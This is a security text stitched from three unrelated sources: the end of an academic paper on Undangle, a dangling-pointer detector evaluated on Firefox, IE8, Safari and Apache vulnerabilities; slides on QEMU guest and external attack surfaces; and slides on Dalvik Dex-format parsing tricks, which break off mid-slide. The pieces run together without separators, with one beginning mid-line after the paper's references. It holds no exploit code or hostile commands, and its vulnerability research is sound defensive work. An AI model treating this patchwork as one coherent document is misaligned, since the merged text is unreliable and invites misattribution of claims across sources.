Apache web server. All vulnerable programs are run in-
side a Windows XP Service Pack 3 guest OS.
The last column in Table 2 shows the vulnerability type.
Six of them are use-after-free vulnerabilities and one is a
double free. The final one is an underflow that was incor-
rectly flagged as a use-after-free; we use it to demonstrate
how Undangle can verify doubtful disclosures. In 5 of
the 6 use-after-free vulnerabilities, the dangling pointers
5Vulnerabilities privately reported through bounty programs [34] are
assigned a CVE identifier but typically have no public exploit.
Table 3: Vulnerability analysis results.
Name Num Threads τuse Dangling Dangling Heap Class Trace Time
uses (inv./exist) (creation) (use) objects size (sec)
apache 1 1 / 3 767,014 10 (5/4/1/0) 3 (2/0/1/0) 2 / 1 NS 96.8 MB 39
aurora 1 1 / 11 6,938,180 7 (2/4/0/1) 1 (1/0/0/0) 2 / 1 S 1.0 GB 438
firefox1 1 1 / 9 987,707 4 (2/2/0/0) 1 (1/0/0/0) 2 / 1 S 2.0 GB 1,072
firefox2 1 1 / 10 5,364 2 (1/1/0/0) 1 (1/0/0/0) 1 / 1 NS 3.3 GB 1,918
firefox3 1 1 / 7 11,000 5 (2/3/0/0) 1 (1/0/0/0) 2 / 1 S 2.4 GB 1,982
ie8 3 1 / 10 1,984,815 10 (2/7/0/1) 1 (1/0/0/0) 2 / 1 O 0.4 GB 165
safari 1 1 / 6 121,284 8 (3/4/0/1) 3 (2/1/0/0) 2 / 1 NS 0.6 GB 260
are data pointers that are created by freeing heap mem-
ory (uaf-h ). The Apache vulnerability is different in
that the dangling pointers are created by the modisapi
module unloading a library that it had previously mapped
into memory ( uaf-m ). In this vulnerability, the dangling
pointers are function pointers used to call functions in the
external library once it has been unloaded. The first 7
vulnerabilities illustrate the fact that most vulnerabilities
due to dangling pointers are use-after-free vulnerabilities
caused by freeing heap memory, but other types exist as
well.
4.1 Vulnerability Analysis Results
Table 3 summarizes the results of applying early detec-
tion to diagnose the first 7 vulnerabilities in Table 2. For
each vulnerability we collected an execution trace of the
vulnerable program running on the publicly available ex-
ploit. Then, we ran Undangle on the execution trace with
an infinite safety window size and analyzed the output in-
formation.
The first column shows the number of dangling pointer
uses the tool flags. In six of the vulnerabilities there is
only one dangling pointer use, which corresponds to the
one that causes the vulnerability and makes the program
behave incorrectly and in most cases crash (only the fire-
fox2 double free does not crash). In the ie8 vulnerabil-
ity the program dereferences the same dangling pointer 3
times, with only the last dereference making the program
crash. These results show that early detection correctly
detects all 7 vulnerabilities with zero false negatives.
Early detection provides information about the number
of threads involved in the vulnerability and the total num-
ber of threads in the trace. The Threads column shows
that although all programs are multi-threaded (from 3 to
11 threads in the trace), only one thread is involved in
the vulnerability, meaning that the same thread creates the
dangling pointers by calling the deallocation function and
dereferences or double frees the dangling pointer. This is
expected since non-deterministic bugs involving multiplethreads are difficult to replicate and exploit and we se-
lected vulnerabilities that had publicly available exploits.
Theτusecolumn shows the number of instructions ex-
ecuted by the program between the time the dangling
pointer was created and the time when it was first used.
This value is a property of the vulnerability and varies
from 5,000 instructions in the double free vulnerability
up to almost 7 million in the aurora vulnerability. This il-
lustrates that vulnerabilities may happen much later than
the creation of the dangling pointers (the root cause of the
vulnerability) and thus the importance of early detection
for vulnerability analysis because it obtains information
about the creation of the dangling pointers in addition to
their use. Note that exploits tend to be optimized to trigger
the vulnerability as quickly as possible; for other inputs
τusecould be even larger.
The two Dangling columns show respectively the num-
ber of dangling pointers at creation, and when the vulner-
ability (use) happens. The total number of dangling point-
ers is also split by the region where the dangling pointers
are stored (Heap / Stack / Data / Register). The creation
column shows that the deallocation produces from 2 up
to 10 dangling pointers of which 54% are stored in the
stack, 37% in the heap, 6% in registers, and 2% in data
regions. The use column shows that most dangling point-
ers are short-lived and have been destroyed by the time
the program uses one of them. In 5 out of 7 vulnera-
bilities a unique dangling pointer exists at use time, the
exception being the apache and safari vulnerabilities each
with 3 dangling pointers at use time. It also shows that
dangling pointers stored in the stack and registers are spe-
cially short-lived; at use time all but one dangling pointers
are stored in the heap.
TheHeap Objects column focuses on the (longer-lived)
dangling pointers stored in the heap, showing the number
of heap objects holding the dangling pointers stored in the
heap (creation/use). Note that the same heap object may
contain more than one dangling pointer, e.g., in the apache
and safari vulnerabilities. Next, we determine which of
the dangling pointers stored in the heap at creation was
used to deallocate the object and which was used to pro-
duce the vulnerability. Based on which heap objects hold
these two dangling pointers we classify the vulnerabilities
as being caused by: a non-sharing (NS) dangling pointer
bug if both dangling pointers are stored in the same ob-
ject, a sharing (S) bug if they are stored in different ob-
jects, and other (O) if any of those two dangling pointers
is not stored in the heap or copied from one in the heap.
Among these 7 vulnerabilities, the non-sharing and shar-
ing classes of dangling pointer bugs are equally likely.
Performance evaluation. The next two columns in Ta-
ble 3 show the performance evaluation including the size
of the execution traces and the time it took to run the tool
on each trace. The results show that Undangle takes from
less than a minute to at most 33 minutes to run. Over-
all, automating the diagnosis using Undangle saves sig-
nificant effort compared to an analyst’s manual work.
Checking vulnerability reports. We also run Undangle
on the last vulnerability in Table 2, which is incorrectly
reported in the CVE database as: ”Use-after-free vulner-
ability in Microsoft Internet Explorer 6, 7, and 8” [8].
However, the report by Microsoft states that it is caused
by an underflow that allows to overwrite a virtual table
pointer [9]. Undangle did not report any dangling pointer
dereferences, confirming that it is not a use-after-free vul-
nerability.
4.2 Vulnerability Analysis Case Study
In this section we demonstrate the importance of using
early detection to diagnose vulnerabilities caused by dan-
gling pointers. In particular, we show that the same under-
lying dangling pointer bug causes the firefox1 and fire-
fox3 vulnerabilities. The Firefox developers did not un-
derstand this [5,6] and provided incomplete fixes for both
vulnerabilities, so that the patched version of Firefox was
still vulnerable to other versions of the same bug.
Figure 7 shows the relevant heap state at creation for the
firefox1 vulnerability. All information in the figure has
been automatically extracted using our tools. The solid
ovals are the heap objects storing the dangling pointers,
and the dashed oval is the object that has just been deal-
located. Each object contains its address, size, and type.
The type and line information (shown on top of the ob-
jects) is obtained by the symbol reader from the publicly
available symbols. Each dangling pointer (edge) is la-
beled with its store address and the name of the field stor-
ing it. The figure also shows which pointer was used to
deallocate the object (freer) and which pointer was deref-
erenced (user).
Figure 7: Relevant heap state at creation for the firefox1
vulnerability (Firefox 3.6.16).
Figure 8: Relevant heap state at creation for the firefox3
vulnerability (Firefox 3.5.1).
Figure 8 shows the same state for the firefox3 vul-
nerability. The similarities between both figures are
striking. In both bugs a nsXPC WrappedJS object
shares ownership of a nsXPTCStubBase object with a
third object. The nsXPCWrappedJS object is reference
counted. When nsXPCiWrappedJS.Release is in-
voked, if the reference count hits zero, the function first
freesnsXPTC StubBase creating two dangling point-
ers, and then immediately frees nsXPCWrappedJS ,
destroying the dangling pointer it stores. The other
dangling pointer remains and will be eventually deref-
erenced. The line number information over the
nsXPTCStubBase object indicates that the call to
nsXPCWrappedJS.Release is at the same program
point on both bugs (the difference in line numbers is due
to different Firefox versions).
This indicated that we were looking at two instances of
the same bug. We verified this by looking at the relevant
lines of code. Both bugs happen because when invoking
from JavaScript code a method exported through the
XPCOM interface [7], the JavaScript parameters to the
method are first converted by the XPCOM interface to na-
tive objects (the nsXPCWrappedJS andnsXPTCStub
Table 4: Safety window size selection results.
Window Num Num Stack Sharing
size Dang. bugs hash bugs
500 1006 637 114 12
5,000 421 352 63 12
50,000 344 281 55 12
500,000 234 222 50 12
5,000,000 191 182 41 10
Base objects). Then, the method is invoked on the
native objects and on return the native objects are freed.
However, if the JavaScript method stores a reference to
the parameter, that reference becomes dangling on return
of the method. The reporter of both vulnerabilities found
two such methods exported through the XPCOM in-
terface: nsIChannelEventSink.onChannel
Redirect which sets the mChannel pointer
to the new channel passed as a parameter, and
nsTreeSelection.SetTree which sets the
mTree pointer to the tree passed as parameter.
Unfortunately, other such methods exist including
OnChannelRedirect innsXMLHttpRequest .
The Firefox developers fixed the two vulnerabilities
by preventing the use of the exported interfaces by the
attacker. However, because other such interfaces and
methods exist, the fix is not complete and the same bug
could be exploited on the patched version using a differ-
ent method. This illustrates that a dangling pointer bug
can be the root cause of multiple vulnerabilities. If the
developers had used Undangle they could have identified
the common root cause of these two vulnerabilities: the
nsXPTCStubBase object is not reference counted and
thus there is no way for other objects to know when it no
longer exists. Fixing that root cause would have protected
the users against the whole family of vulnerabilities the
bug introduced. Fortunately, newer versions of Firefox
(e.g., Firefox 6.0.2) have completely rewritten this part of
the code, closing this hole.
4.3 Testing Results
Our testing evaluation is split in three parts. First, we eval-
uate the selection of the safety window size using a trace
of Firefox 6.0.2. Then, we manually analyze the long-
lived dangling pointers that Undangle finds in that trace.
Finally, we use an external fuzzing tool to generate 30 in-
puts on which we run Firefox 10.0 and apply Undangle to
the resulting traces.
Safety window size selection. To select an appropriate
safety window size for testing, we take an execution trace
of Firefox 6.0.2 and evaluate the size of the safety windowthat minimizes alarms due to short-lived dangling point-
ers. Table 4 shows the early detection results using 5 dif-
ferent safety window sizes. The first column shows the
number of dangling pointers detected and the second col-
umn the (smaller) number of dangling pointer bugs since
one bug may create multiple dangling pointers. The third
column shows the results of applying the fuzzy stack hash
proposed by Molnar et al. [42] to group together instances
of the same bug. The results show that the largest decrease
in alarms, without excluding any sharing bugs, happens
when increasing the size from 500 to 5,000 instructions.
As any size less than 5,364 instructions is sufficient to de-
tect all vulnerabilities in Table 3 before they happen, we
select 5,000 as the safety window size.
Bug analysis. We manually evaluate whether the alarms
in the Firefox 6.0.2 trace, with the selected safety window
size of 5,000, are true positives or false positives. For
this we limit the analysis to the sharing bugs because they
are the most difficult to identify with existing approaches.
There are 12 sharing bugs with a 5,000 instruction win-
dow. Out of these 12, our manual analysis identifies that 4
are unique bugs and the other 8 are duplicates, which the
fuzzy stack hash failed to identify6.
All four unique bugs truly correspond to long-lived
dangling pointers. We manually analyze Firefox’s source
code to determine if those long-lived dangling pointers
are unsafe or only latent. In 3 of those 4 we believe that
the dangling pointers are only latent and will not be later
dereferenced by the program (i.e., they are protected by
a reference count that has hit zero). However, the safer
solution would be to proactively fix them, eliminating the
possibility of later code changes turning them into unsafe
dangling pointers. For the last bug, we believe it is unsafe
because there exist other paths that could use the dangling
pointer. We have reported it to Mozilla. Our disclosure
has been accepted as a bug and is currently under evalua-
tion to determine if it can be exploited – highlighting the
difficulty of determining if a dangling pointer will ever be
used in a complex code base.
Combining Undangle with a fuzzing tool. To achieve
coverage, Undangle needs to be run in combination with
an external input generation tool. In this experiment, we
use the Bf3 (Browser Fuzzer 3) tool to generate 30 in-
puts (10 using the JavaScript fuzzing mode, another 10
using the DOM fuzzing mode, and the rest using the XML
fuzzing mode). We run Firefox 10.0 (the latest version of
Firefox at the time) on these inputs and evaluate the re-
sults of running Undangle on the resulting traces. The
results in Table 5 show that after bucketing with the fuzzy
6The fuzzy stack hash is a heuristic, experimentally shown to group
many instances (but possibly not all) of the same bug [42].
Table 5: Testing results on 30 inputs generated by the Bf3 web browser fuzzer.
Window Fuzz Num Num Num Stack Sharing
size mode traces Dang. bugs hash bugs
5,000 JS 10 30 30 2 0
5,000 DOM 10 30 30 2 0
5,000 XML 10 30 30 2 0
5,000 All 30 90 90 2 0
stack hash, there are only 2 unique bugs, which are both
non-sharing bugs. Both bugs are located in internal Win-
dows functions that get called when Firefox loads a DLL
using the ntdll.dll::LdrLoadDll function. The
first bug happens because ntdll.dll::LdrLoadDll
invokes the advapi32.dll::FreeSid function to
free a 12-byte Security Identifier (SID) structure it
has previously allocated. The Microsoft programmers
did not nullify the pointer passed as parameter to
advapi32.dll::FreeSid on return from the func-
tion. The second bug happens because the pointer re-
turned by the allocation of a 52-byte object (of unknown
type) gets stored in a local variable, which is not nullified
after the object is deallocated.
Since we have no source code for Windows libraries,
we cannot determine if these two bugs are unsafe (note
that non-sharing bugs can be exploitable; 3 of the vulner-
abilities in Table 2 are of this type). However, we can
draw three important conclusions from this experiment.
First, Undangle identified 2 dangling pointer bugs that
prior tools cannot detect since the dangling pointers were
created but never used in the execution. Second, Undangle
showed a zero false positive rate in that it identified 2 dan-
gling pointer bugs and nothing else. Third, using the diag-
nosis information output by Undangle, it took one of the
authors less than 5 minutes to understand both bugs. With
source code and debugging symbols, in those 5 minutes
we would have known which pointer to nullify to fix the
bugs. With such low effort we believe it is cost-effective
to fix dangling pointer bugs, even if exploitability is un-
clear.
5 Related Work
Dangling pointers can be eliminated by writing programs
in safe languages (e.g., Java, OCaml, safe C dialects [37])
and by using smart pointers [16]. However, in this sec-
tion, we focus on solutions that target legacy code with
minimal modifications.
Memory analysis tools. Popular debugging tools such
as Valgrind [11] and Purify [36], check if a dereferencedpointer points to live memory. This approach misses dan-
gling pointers that, when dereferenced, point to an object
that has reused the memory range. To address this limi-
tation other debugging tools such as Electric Fence [47]
and PageHeap [12] use a new virtual and physical page
for each allocation and rely on page protection mecha-
nisms to detect dangling pointers. Early detection instead
detects dangling pointers at creation providing detailed in-
formation about the root cause of the vulnerability. There
has been work on extending Valgrind with taint propaga-
tion [32, 45] but those approaches only use a taint bit per
program location and do not address pointer tracking.
Runtime protection. A common approach for protect-
ing deployed programs against dangling pointers is re-
placing the default memory management functions with
safer alternatives. Conservative garbage collection elimi-
nates vulnerabilities by deallocating memory blocks only
when they are not referenced [20] but it does not help de-
tect dangling pointers. Dhurjati and Adve [29] use a new
virtual page for each allocation reducing memory usage
by reusing the physical page and even the virtual page if it
becomes inaccessible. DieHard [19] uses a randomized
memory allocator making it unlikely that a deallocated
object will soon be replaced by a subsequent allocation.
Recently, Akritidis introduces Cling [15], a memory allo-
cator based on type-safe memory reuse, a technique that
restricts memory reuse to objects of the same type [30].
A defense based on type-safe memory reuse has been de-
ployed in parts of the Firefox browser [46]. In this paper
we have evaluated early detection as an offline technique
for testing and vulnerability analysis, which differs from
the above in that it identifies dangling pointers when they
are created. We leave the study of early detection for run-
time protection as future work.
Safe compilers. Safe compilers insert dynamic checks to
detect spatial safety violations [17,18,38,44,51] and also
temporal safety violations [17, 43, 51]. Early detection
does not require source code and detects dangling pointers
before they are used.
Type inference. Type inference techniques on binary pro-
grams have been proposed but they were not adequate for
our problem. Caballero et al. [22, 23] apply taint track-
ing to infer types in buffers holding input and output mes-
sages. Undangle uses a similar approach but types all pro-
gram locations storing pointers. Rewards [40] uses type
unification for revealing general data structures in a pro-
gram. Using Rewards we could miss pointers that have
not yet been dereferenced. TIE [39] infers types in pro-
gram binaries and execution traces by solving a constraint
system. In our problem, solving a constraint system at
each instruction would be too costly.
Taint tracking. Taint tracking has been applied to diverse
applications including worm containment [28], limiting
the lifetime of sensitive data [50], control-flow hijacking
detection [27,45], protocol reverse-engineering [25], data
structure recovery [49], and type inference [40]. Our tech-
nique uses it for tracking pointers.
6 Conclusion
In this work we proposed early detection, a novel ap-
proach for identifying and diagnosing use-after-free and
double-free vulnerabilities. Early detection shifts the fo-
cus from the use of a dangling pointer that introduces
a vulnerability, to the creation of that dangling pointer,
which is the root of the vulnerability. We designed an
early detection technique that identifies dangling point-
ers when they are created and tracks them until they are
used or become unsafe. We implemented the technique
into a tool called Undangle and demonstrated its value
for vulnerability analysis and testing for unsafe dangling
pointers. Our results show that Undangle can be used to
quickly understand and eliminate the root cause of use-
after-free and double-free vulnerabilities, fixing the pro-
gram for good. Undangle also finds long-lived, potentially
unsafe, dangling pointers that should be removed to elim-
inate any vulnerabilities they may introduce and avoid in-
troducing new ones.
7 Acknowledgements
We would like to thank Earl Barr and the anonymous re-
viewers for their insightful comments. This work was
supported in part by the European Union through Grants
FP7-ICT No. 256980 and FP7-PEOPLE-COFUND No.
229599. Juan Caballero was also partially supported by
a Juan de la Cierva Fellowship from the Spanish Govern-
ment. Opinions expressed in this material are those of
the authors and do not necessarily reflect the views of the
sponsors.References
[1] Bf3: Browser Fuzzer 3.
[2] TEMU: The BitBlaze Dynamic Analysis Compo-
nent.
[3] QEMU: Open Source Processor Emulator.
[4] Exploits Database By Offensive Security.
[5] Bugzilla@Mozilla: Bug 634986.
[6] Bugzilla@Mozilla: Bug 630919.
[7] Mozilla Developer Network: XPCOM.
[8] CVE-2010-3962. October 2010.
[9] DEP, EMET Protect Against Attacks on the Latest
Internet Explorer Vulnerability. November 2010.
[10] Defence in Depth: Internet Explorer 0-Day: CVE-
2010-3971. January 2011.
[11] Valgrind. July 2011.
[12] Page Heap for Chromium. July 2011.
[13] .. Common Vulnerabilities and Exposures.
[14] J. Afek and A. Sharabani. Dangling Pointer - Smash-
ing the Pointer for Fun and Profit. BlackHat USA ,
Las Vegas, CA, July 2007.
[15] P. Akritidis. Cling: A Memory Allocator to Mitigate
Dangling Pointers. USENIX Security , Washington,
D.C. July 2010.
[16] A. Alexandrescu. Modern C++ Design: Generic
Programming and Design Patterns AppliedC.
Addison-Wesley, ed. Addison-Wesley, 2001.
[17] T. M. Austin, S. E. Breach, and G. S. Sohi. Efficient
Detection of All Pointer and Array Access Errors.
PLDI , Orlando, Florida, June 1994.
[18] D. Avots, M. Dalton, B. V . Livshits, and M. S. Lam.
Improving Software Security with a C Pointer Anal-
ysis. ICSE , Saint Louis, Missouri, May 2005.
[19] E. D. Berger and B. Zorn. DieHard: Probabilis-
tic Memory Safety for Unsafe Programming Lan-
guages. PLDI , Ottawa, Canada, June 2006.
[20] H. Boehm and M. Weiser. Garbage Collection in
an Uncooperative Environment. Software – Practice
and Experience , 18, September 1988.
[21] J. Caballero. Grammar and Model Extraction for
Security Applications Using Dynamic Program Bi-
nary Analysis. Ph.D. Thesis, Department of Elec-
trical and Computer Engineering, Carnegie Mellon
University, Pittsburgh, PA, September 2010.
[22] J. Caballero and D. Song. Rosetta: Extracting Pro-
tocol Semantics Using Binary Analysis with Appli-
cations to Protocol Replay and NAT Rewriting. Cy-
lab, Carnegie Mellon University, Technical Report
CMU-CyLab-07-014, Pittsburgh, Pennsylvania, Oc-
tober 2007.
[23] J. Caballero, P. Poosankam, C. Kreibich, and
D. Song. Dispatcher: Enabling Active Bot-
net Infiltration Using Automatic Protocol Reverse-
Engineering. CCS, ACM, Chicago, Illinois, Novem-
ber 2009.
[24] J. Caballero, P. Poosankam, S. McCamant, D. Babic,
and D. Song. Input Generation Via Decomposition
and Re-Stitching: Finding Bugs in Malware. CCS,
ACM, Chicago, Illinois, October 2010.
[25] J. Caballero, H. Yin, Z. Liang, and D. Song. Poly-
glot: Automatic Extraction of Protocol Message
Format Using Dynamic Binary Analysis. CCS,
ACM, Alexandria, Virginia, October 2007.
[26] C. Cadar, V . Ganesh, P. M. Pawlowski, D. L. Dill,
and D. R. Engler. EXE: A System for Automatically
Generating Inputs of Death Using Symbolic Execu-
tion. CCS, Ari Juels, Rebecca N. Wright, and Sab-
rina De Capitani di Vimercati, ed. ACM, Alexandria,
Virginia, October 2006.
[27] J. Chow, B. Pfaff, T. Garfinkel, K. Christopher, and
M. Rosenblum. Understanding Data Lifetime Via
Whole System Simulation. USENIX Security , San
Diego, California, August 2004.
[28] M. Costa, J. Crowcroft, M. Castro, A. Rowstron, L.
Zhou, L. Zhang, and P. Barham. Vigilante: End-
to-End Containment of Internet Worms. SOSP ,
Brighton, United Kingdom, October 2005.
[29] D. Dhurjati and V . Adve. Efficiently Detecting
All Dangling Pointer Uses in Production Servers.
DSN , IEEE Computer Society, Philadelphia, PA,
June 2006.
[30] D. Dhurjati, S. Kowshik, V . Adve, and C. Lat-
tner. Memory Safety Without Runtime Checks Or
Garbage Collection. LCTES , San Diego, California,
June 2003.[31] I. Dobrovitski. Exploit for CVS Double Free() for
Linux Pserver. February 2003.
[32] W. Drewry and T. Ormandy. Flayer: Exposing Ap-
plication Internals. WOOT , Boston, Massachusetts,
August 2007.
[33] P. Godefroid, N. Klarlund, and K. Sen. DART: Di-
rected Automated Random Testing. PLDI , Chicago,
Illinois, June 2005.
[34] Google. Rewarding Web Application Security Re-
search. November 2010.
[35] Z. Gu, E. T. Barr, D. J. Hamilton, and Z. Su. Has the
Bug Really Been Fixed? ICSE , Cape Town, South
Africa, May 2010.
[36] R. Hastings and B. Joyce. Purify: Fast Detection of
Memory Leaks and Access Errors. USENIX Winter ,
San Francisco, California, 1992.
[37] T. Jim, G. J. Morrisett, D. Grossman, M. W. Hicks,
J. Cheney, and Y . Wang. Cyclone: A Safe Dialect of
C.USENIX ATC , Monterey, CA, June 2002.
[38] R. W. M. Jones and P. H. J. Kelly. Backwards-
Compatible Bounds Checking for Arrays and Point-
ers in C Programs. International Workshop on Auto-
mated Debugging , Link  ̈oping, Sweden, May 1997.
[39] J. Lee, T. Avgerinos, and D. Brumley. TIE: Princi-
pled Reverse Engineering of Types in Binary Pro-
grams. NDSS , San Diego, California, February
2011.
[40] Z. Lin, X. Zhang, and D. Xu. Automatic Reverse
Engineering of Data Structures from Binary Execu-
tion. NDSS , San Diego, California, February 2010.
[41] B. P. Miller, L. Fredriksen, and B. So. An Empirical
Study of the Reliability of UNIX Utilities. Commu-
nications of the ACM , 33, December 1990.
[42] D. Molnar, X. C. Li, and D. A. Wagner. Dynamic
Test Generation to Find Integer Bugs in X86 Bi-
nary Linux Programs. USENIX Security , Montr  ́eal,
Canada, August 2009.
[43] S. Nagarakatte, J. Zhao, M. M. K. Martin, and S.
Zdancewic. CETS: Compiler-Enforced Temporal
Safety for C. ISMM , Toronto, Canada, June 2010.
[44] G. C. Necula, S. McPeak, and W. Weimer. CCured:
Type-Safe Retrofitting of Legacy Code. POPL , Port-
land, Oregon, January 2002.
[45] J. Newsome and D. Song. Dynamic Taint Anal-
ysis for Automatic Detection, Analysis, and Sig-
nature Generation of Exploits on Commodity Soft-
ware. NDSS , San Diego, California, February 2005.
[46] R. O’Callahan. Mitigating Dangling Pointer Bugs
Using Frame Poisoning. October 2010.
[47] B. Perens. Electric Fence Malloc Debugger. July
2011.
[48] A. Schneider. 0-Day Exploit Used in a Targeted At-
tack CVE-2011-1255. June 2011.
[49] A. Slowinska, T. Stancescu, and H. Bos. Howard:
A Dynamic Excavator for Reverse Engineering Data
Structures. NDSS , San Diego, California, February
2011.
[50] G. E. Suh, J. W. Lee, D. Zhang, and S. Devadas. Se-
cure Program Execution Via Dynamic Information
Flow Tracking. ASPLOS , Boston, Massachusetts,
October 2004.
[51] W. Xu, D. C. DuVarney, and R. Sekar. An Efficient
and Backwards-Compatible Transformation to En-
sure Memory Safety of C Programs. FSE, Newport
Beach, California, October 2004.
[52] K. Zetter. Hack of Google, Adobe Conducted
through Zero-Day IE Flaw. January 2010.
[53] d0cs4vage. Insecticides Don’T Kill Bugs, Patch
Tuesdays Do. June 2011.QEMU Attack Surface and
Security Internals
Qiang Li && Zhibin Hu 
Qihoo 360 Gear T eam    
HITB GSEC 2017
About us
2Qihoo 360 
One of the most famous security company in China
Gear Team
Focus on the vulnerability discovery/analysis
Xen, QEMU, OpenSSL, Firefox, NTP , etc
About us
3Security researcher in Qihoo 360 Inc(Gear Team)
Vulnerability discovery and analysis
Over 100+ CVEs in QEMU, VirtualBox, Linux kernel
CanSecWest /Ruxcon /SyScan360
Agenda
4QEMU introduction
QEMU attack surfaces
Attack from guest
Attack from external
Summary
5
QEMU introduction
QEMU introduction
6
Full system/User mode emulation
Software emulation
Accelerator such as KVM/XEN
QEMU introduction
7QEMU is a user process
QEMU’s virtual address space as 
Guest RAM
QEMU’s thread as Guest vCPU

QEMU introduction
8QEMU
Guest
Host kernel

9
QEMU attack surfaces
QEMU attack surfaces
10Security is about untrust data
Data from vm, most is device 
emuation
Data from external, 
vnc/spice/ qmp , etc

QEMU attack surfaces
11Device emulation is the most,
a lot of vulns and high quality vulns
Full emulation is discussed a lot,
the virtio not
Qemu guest agent( qga), not powerful 
as vmware tools, not very vulns

QEMU attack surfaces
12VNC for remote access, not only VMs
Spice is for remote access to VMs
Contains Protocol, Client, Server, Guest
QEMU Machine Protocol(QMP), 
allows application interact with QEMU
Malicious image

13
Attack from guest
Attack from guest
14Device emulation is the biggest 
source of vulns
virtio, ioparavirtualization for kvm
The 3rd library, virglrenderer

Attack from guest -device emulation
15Most of the devices are software 
emulation based
Guest is unaware of the underlying 
virtualization environment
Many devices should be emulated, 
such as disk, network card, etc

Attack from guest -device emulation
16PCI devices exposes BAR(Base 
Address Register)
to OS, QEMU provides this 
layer in device emulation
The guest OS interacts with the device by reading and 
writing to the BARs registered by the device. BAR R/W 
operations trap to the KVM and control is passed to 
QEMU
Attack from guest -device emulation
17Previously there has not been much 
consideration of vulnerabilities present 
in KVM
Guest data is untrusted and can be maliciousData flow: Guest ->QEMU
Attack from guest -device emulation
18Two types of BARs: IO port && MMIO
Read/write IO port/MMIO to trigger flaws
Malicious kernel module 
acts as a driver
Attack from guest -example
19Cirrus VGA
Bitblt copy in backward mode

Attack from guest -example
20

Attack from guest -virtio
21virtio for ioparavirtualization
Front -end in guest,Back -end in 
qemu
Decrease the VM -exit

Attack from guest -virtio
22The guest: add buf/ kick / get buf
Qemu: pop / push
Malicious guest write the data to 
qemu

Attack from guest -virtio
23Every vqueue has a handler
Handler pop the request from 
guest
All virtio device process the 
request with the same model

Attack from guest -virtio
24request ->cmd
The reqeust can be filled 
totally by the VM
Trigger a lot of vulns

Attack from guest -example
25VirtFS , paravirtualized
filesystem
Share files between 
host/guest

Attack from guest -example
26A handler array to process 
the request
Every handler will unmarshal
the argfrom guest
Vulns occur if not being 
sanity check carefully

Attack from guest -example
27

Attack from guest -3rd lib
28Qemu uses some 3rd  lib
Virglrenderer is used to accelerate 3D rendering
A lot of vulns has been found in this lib
CVE-2017 -6386 , CVE -2017 -6355, CVE -2017 -6317, CVE-2017 -6210,
CVE-2017 -6209 , CVE -2017 -5994, CVE-2017 -5993,CVE -2017 -5957,
CVE-2017 -5956 , CVE -2016 -10214, CVE-2017 -5937,CVE -2016 -10163,
CVE-2017 -5580
Attack from guest -3rd lib
29

30
Attack from external
Attack from external -vnc
31VNC is for desktop sharing system 
based RFB protocol
QEMU has a built -in vncserver
Several vulns has been found in this

Attack from external -vnc
32

Attack from external -spice
33Spice is for remote access to 
vms
Protocol,Client,Server and 
guest
Vulns can exist in qxldriver -
>device, client ->server

Attack from external -spice
34

Attack from external -qmp
35HMP/QMP is used to interacted with QEMU
Lightweight, text -based data format
Very useful, such as capabilities negotiation, 
device (un) hotplug ,
Attack from external -qmp
36

37
Summary
Summary
38Most of our vulnerability is from the guest
Device emulation is the biggest attack surface
virtio and 3rd library security should be taken more 
foucs
39Thank 
youQiang Li && Zhibin Hu
Gear T eam , Qihoo 360 Inc
liq3ea@gmail.com
huzhibin@360.cnAbusing Dalvik  
Beyond Recognition  
Jurriaan  Bremer  
Who?  
Jurriaan  Bremer  
•Freelance Security Researcher  
•Student (University of Amsterdam)  
•Interested in Mobile Security & Low -level stuff  
–Core Developer of Cuckoo Sandbox 
(http://cuckoosandbox.org/ ) 
–Author of Open Source ARMv7 Disassembler 
(http://darm.re/ ) 
–Blog ( http://jbremer.org/ ) 
•Eindbazen  CTF Team, The Honeynet  Project  
 
 
What?  

Why?  
•Broken stuff is good stuff  
•New ways to mess with analysis  
•Break analysis tools  
•To have fun..  
 
 
Android Introduction  
•Android phones (usually) run ARMv7  
•Based on a heavily modified Linux kernel  
•An application is an APK – a Zip file 
–Contains metadata: signatures, android manifest, etc 
–Code, Images, Data, .. 
•Applications ’ code  
–Mainly written in Java , but may contain native  cod 
–Dalvik : Android’s Java Virtual Machine  
–All code goes in to classes.dex  (the Dex file format)  
 
Dex File Format  
•Simple File Header  
•Various Data Pools  
–Compact Data Structures  
•Fixed -length lookup tables  
–Represent one thing each  
•Strings, Data Types  
•Field/Method definition  
•Data section  
–Variable -length information  
–E.g., the actual Dalvik  code  
 
 
Dex File Format: Strings  
ULEB128: Compact storage for small 32 -bit ints 
Utilizes 1 up to 5 bytes:  
•42  1 byte  (0x2a)  
•1337   2 bytes  (0xb9 0x0a)  
•0xffffffff  5 bytes  (0xff 0xff 0xff 0xff 0x0f)  
string_id_item  = in string_id  pool  
string_data_item  = in data section  

Strict verifier  of the Dex File Format  
•Enforces a lot of rules  
–See the Dex specification  
(http://source.android.com/devices/tech/dalvik/dex -format.html)  
Both documented & undocumented  
E.g., manual states map_list  is optional – it’s not.  DexOpt  
Manual:  
libdex : 
DexOpt  
Many strict rules , including, e.g.:  
•No more padding than required  
–Extra byte of padding? Shame on you!  
•Padding must consist of zeroes only  
•Entries in the Data Pools must be unique  
–May not define the same string twice  
•Entries in the Data Pools must be sorted  
–string “a” comes before string “b”  
–type 42 comes before type 1337  
Dalvik  101 
public static void hello() {  
      System.out .println (“Hello Hack.lu ”); 
} 
 
sget-object v0, System; ->out:PrintStream ; 
const -string v1, ”Hello Hack.lu”  
invoke -virtual v0, v1, PrintStream ;->println (String ;)V 
return -void  
 
 
Dalvik  102 
•Register -based Instruction Set  
–Allocates a fixed -size amount of registers for a function  
–More efficient than Java’s stack -based instruction set  
•Various General Purpose Instructions  
–Move, add, subtract, multiply, etc 
•Fixed branches  
–No “jump register”, only “ goto  $+30” and alike  
•Class, Static and Array get/put instructions  
–To read/write class members & array indices  
•Special: Switch/case, array -length, const -string, .. 
DexOpt  Continued  
Strict verification of Dalvik  Bytecode  
•All branches  must point to valid Bytecode  
–Checks for out -of-bounds code access  
•Type checking  
–Objects can’t do arithmetic  
–Strings can’t perform the “array -length” instruction  
–Can’t “invoke -static” a virtual method  
–Argument count & types must match prototypes  
•E.g., prototype ( Lfoo;II )V requires  3 parameters  
(One foo object and two integers – method has no return value.)  
“Parser Differentials”  
•Term coined by Meredith Patterson, Len 
Sassaman, Sergey Bratus  et al 
–N parsers  with 1 input, 1..N different interpretations  
–Parser/Docs inconsistency leads to “funny” stuff  
•map_list  is a Parser Differential  
–Not a very interesting one though..  
–Hint hint.. ;-) 
Straight from the Documentation  
 

“Parser Diff.. WAIT  WHAT?!?! ” 
libdex /DexFile.h : 
 
 
oo/Object.h : 

Dex vs ODex  
•ODex  – Optimized Dex Files  
–Created after verifying Dex file 
